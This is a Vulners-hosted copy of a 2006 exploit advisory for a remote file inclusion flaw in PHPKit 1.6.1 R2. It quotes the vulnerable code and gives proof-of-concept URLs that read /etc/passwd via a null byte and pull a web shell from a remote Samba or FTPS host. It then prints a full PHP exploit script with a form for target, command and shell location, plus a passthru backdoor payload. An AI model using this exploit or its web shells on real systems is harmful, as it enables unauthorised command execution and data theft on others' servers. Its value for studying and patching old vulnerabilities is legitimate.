Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpkit_161r2_incl_xpl.txt

🗓️ 20 Feb 2006 00:00:00Reported by rgodType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

PHPKit v1.6.1 Vulnerabilit

Code
`---------- PHPKit <= v.1.6.1 release 2 remote code execution -------------------  
  
software:  
site: www.phpkit.de  
description: a Content Management / homepage / community building software  
written in PHP language  
--------------------------------------------------------------------------------  
  
vulnerable code in include.php at line 558/579:  
  
  
...  
if(!empty($path))  
$path_filename=pkDIRPUBLIC.(substr($path,-4)=='.php' ? substr(basename($path),0,-4) : $path).pkEXT;  
  
if(filecheck($path_filename))  
{  
include($path_filename);  
}  
[*] elseif(filecheck($path) && strstr(strtolower($path),'.php') && !strstr(strtolower($path),'http://') && !strstr(strtolower($path),'https://') && !strstr(strtolower($path),'ftp://') && !strstr($path,"../"))  
{  
include($path);  
}  
elseif(!strstr(strtolower($file),'http://') && filecheck($file) && !strstr($file,"../") && file_extension($file)!='php')  
{  
$site_body.=implode('',file($file));  
}  
elseif(!empty($src))  
{  
$src=pkEntities($src);  
eval("\$site_body.=\"".getTemplate("site_iframe")."\";");  
}  
else  
pkEvent('page_not_found');  
...  
  
and in inc/func/default.php at line 355-362:  
...  
function filecheck($file)  
{  
if(!($fp=@fopen($file,'r')))  
return false;  
  
fclose($fp);  
return true;  
}  
...  
  
"path" var is not properly sanitized before to be used to include files from  
local resources. Look carefully at [*]: script checks if "path" is  
an existing and readable file, it must not contain "http://", "ftp://" url  
wrappers and "../" chars, it must contain the ".php" extension.  
  
This checks can be easily overrided to include files from local and external  
resources, poc:  
  
if magic_quotes_gpc = Off, you can view any file on target system using a null  
char:  
  
http://[target]/[path]/include.php?path=/etc/passwd%00.php  
http://[target]/[path]/include.php?path=c:\boot.ini%00.php  
  
(about this: strstr() function find ".php" extension, but fopen() and include()  
do not consider any char after a null char)  
  
regardless of any php.ini settings you can include an arbitrary php file from  
local resources:  
  
http://[target]/[path]/include.php?path=c:\[path_to]\test.php  
http://[target]/[path]/include.php?path=/[path_to]/test.php  
  
also, since fopen() and include() functions support Samba and FTP secure url  
wrappers, if allow_url_fopen = On, you can include a php file from external  
resources, poc:  
  
from a samba server:  
http://[target]/[path]/include.php?path=\\192.168.1.2\c\shell.php  
  
from a ftp secure server (this should works if php is compiled in support for  
OpenSSL)  
http://[target]/[path]/include.php?path=ftps://username:password@somehost/shell.php  
  
if shell.php have this code inside:  
  
<?php system($_GET[cmd]);?>  
  
you can execute commands on target system, poc:  
  
http://[target]/[path]/include.php?cmd=ls%20-la&path=\\192.168.1.2\c\shell.php  
--------------------------------------------------------------------------------  
exploit:  
  
<?php  
# ---PHPKIT_161r2_incl_xpl.php 4.27 16/02/2006 #  
# #  
# PHPKIT <= 1.6.1R2 remote commands execution exploit #  
# coded by rgod #  
# site: http://retrogod.altervista.org #  
# #  
# -> works with allow_url_fopen = On #  
# usage: launch from Apache, fill in requested fields, then go! #  
# #  
# Sun-Tzu: "All men can see the tactics whereby I conquer, but what none can #  
# see is the strategy out of which victory is evolved." #  
  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",0);  
ob_implicit_flush (1);  
  
echo'<html><head><title>* PHPKIT <= 1.6.1R2 remote commands execution exploit **  
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:  
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img  
{background-color: #FFFFFF !important} input {background-color: #303030  
!important} option { background-color: #303030 !important} textarea  
{background-color: #303030 !important} input {color: #1CB081 !important} option  
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox  
{background-color: #303030 !important} select {font-weight: normal; color:  
#1CB081; background-color: #303030;} body {font-size: 8pt !important;  
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:  
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em  
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em  
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em  
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:  
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited  
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;  
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;  
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;  
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">  
* PHPKIT <= 1.6.1R2 remote commands execution exploit ** </p><p class="Stile6">a  
script by rgod at <a href="http://retrogod.altervista.org"target="_blank">  
http://retrogod.altervista.org</a> </p> <table width="84%"><tr><td width="43%">  
<form name="form1" method="post" action="'.$_SERVER[PHP_SELF].'"> <p><input  
type="text" name="host"> <span class="Stile5">* target (ex:www.sitename.com)  
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:  
/phpkit/ or just / ) </span></p><p><input type="text" name="cmd"> <span  
class="Stile5"> * specify a command </span> </p> <p> <input type="text"  
name="smb_location"><span class="Stile5">* specify a Samba resource(ex: \\\\192.  
168.1.2\\c\\path_to\\shell.php </span></p> <p> <input type="text" name="port">  
<span class="Stile5">specify a port other than 80 (default value)</span> </p>  
<p><input type="text" name="proxy"><span class="Stile5"> send exploit through  
an HTTP proxy (ip:port) </span> </p> <p> <input type="submit" name="Submit"  
value="go!"></p></form></td></tr></table></body></html>';  
  
function show($headeri)  
{  
$ii=0;$ji=0;$ki=0;$ci=0;  
echo '<table border="0"><tr>';  
while ($ii <= strlen($headeri)-1){  
$datai=dechex(ord($headeri[$ii]));  
if ($ji==16) {  
$ji=0;  
$ci++;  
echo "<td>&nbsp;&nbsp;</td>";  
for ($li=0; $li<=15; $li++) {  
echo "<td>".htmlentities($headeri[$li+$ki])."</td>";  
}  
$ki=$ki+16;  
echo "</tr><tr>";  
}  
if (strlen($datai)==1) {  
echo "<td>0".htmlentities($datai)."</td>";  
}  
else {  
echo "<td>".htmlentities($datai)."</td> ";  
}  
$ii++;$ji++;  
}  
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {  
echo "<td>&nbsp&nbsp</td>";  
}  
for ($li=$ci*16; $li<=strlen($headeri); $li++) {  
echo "<td>".htmlentities($headeri[$li])."</td>";  
}  
echo "</tr></table>";  
}  
  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
  
function sendpacket() //2x speed  
{  
global $proxy, $host, $port, $packet, $html, $proxy_regex;  
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);  
if ($socket < 0) {  
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {echo 'Not a valid prozy...';  
die;  
}  
echo "OK.<br>";  
echo "Attempting to connect to ".$host." on port ".$port."...<br>";  
if ($proxy=='') {  
$result = socket_connect($socket, $host, $port);  
}  
else {  
$parts =explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$result = socket_connect($socket, $parts[0],$parts[1]);  
}  
if ($result < 0) {  
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";  
}  
else {  
echo "OK.<br><br>";  
$html= '';  
socket_write($socket, $packet, strlen($packet));  
echo "Reading response:<br>";  
while ($out= socket_read($socket, 2048)) {$html.=$out;}  
echo nl2br(htmlentities($html));  
echo "Closing socket...";  
socket_close($socket);  
}  
}  
}  
  
function sendpacketii($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex;  
if ($proxy=='') {  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
echo 'No response from '.htmlentities($host); die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
echo 'Not a valid prozy...';die;  
}  
$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
echo 'No response from proxy...';die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {  
$html.=fread($ock,1);  
}  
}  
fclose($ock);echo nl2br(htmlentities($html));  
}  
  
$host=$_POST[host];$path=$_POST[path];  
$port=$_POST[port];$smb_location=urlencode(trim($_POST[smb_location]));  
$cmd=urlencode($_POST[cmd]);$proxy=$_POST[proxy];  
echo "<span class=\"Stile5\">";  
  
if (($host<>'') and ($path<>'') and ($cmd<>'') and ($smb_location<>''))  
{  
$port=intval(trim($port));  
if ($port=='') {$port=80;}  
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}  
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}  
$host=str_replace("\r","",$host);$host=str_replace("\n","",$host);  
$path=str_replace("\r","",$path);$path=str_replace("\n","",$path);  
  
# STEP X -> One and unique, arbitrary remote inclusion ...  
$packet="GET ".$p."include.php?CMD=$cmd&path=".$smb_location."/ HTTP/1.1\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="User-Agent: GoogleBot 1.1\r\n";  
$packet.="Connection: Close\r\n\r\n";  
show($packet);  
sendpacketii($packet);  
if (eregi("Hi Master!",$html)) {echo "Exploit succeeded...";}  
else {echo "Exploit failed...";}  
}  
else  
{echo "Note: on \\\\someip\\path_to\\shell.php you need this code:<br><br>";  
echo nl2br(htmlentities("  
<?php  
ob_clean();echo\"Hi Master!\";ini_set(\"max_execution_time\",0);passthru(\$_GET[CMD]);die;  
?>  
"))."<br>";  
echo "Fill * required fields, optionally specify a proxy...";}  
echo "</span>";  
?>  
  
--------------------------------------------------------------------------------  
rgod  
  
site: http://retrogod.altervista.org  
mail: rgod at autistici org  
original adivsory: http://retrogod.altervista.org/phpkit_161r2_incl_xpl.html  
--------------------------------------------------------------------------------  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
phpkitremote code executionsoftwarephpvulnerable codeinclude.phpfile inclusionexploit
30